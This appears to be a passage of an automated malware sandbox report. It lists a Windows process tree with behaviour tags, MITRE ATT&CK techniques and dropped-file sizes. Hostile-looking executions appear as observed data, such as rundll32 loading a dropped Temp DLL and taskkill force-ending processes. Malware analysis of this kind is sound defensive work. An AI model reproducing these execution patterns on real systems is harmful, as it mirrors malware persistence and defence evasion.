C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1348 -ip 13481⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6057C223561C82D6BC61FBE9DB46D128 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DA73A3BA92D6A69F5681812C6A532BDF2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7236 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7236 -ip 72361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7252 -ip 72521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7252 -ip 72521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 6376 -ip 63761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
3Registry Run Keys / Startup Folder
2Scheduled Task
1Winlogon Helper DLL
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
5Impair Defenses
1Install Root Certificate
1Modify Registry
10Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
36KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
384KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.1MB
-
Filesize
5.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
72KB
-
Filesize
64KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
368KB
-
Filesize
12KB
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
272KB
-
Filesize
156KB
-
Filesize
1.3MB
-
Filesize
88KB
-
Filesize
68KB
-
Filesize
3.3MB
-
Filesize
380KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
76KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
132KB
-
Filesize
80KB
-
Filesize
524KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
16.0MB
-
Filesize
492KB
-
Filesize
852KB
-
Filesize
172KB
-
Filesize
228KB
-
Filesize
32KB
-
Filesize
128KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
164KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
80KB
-
Filesize
80KB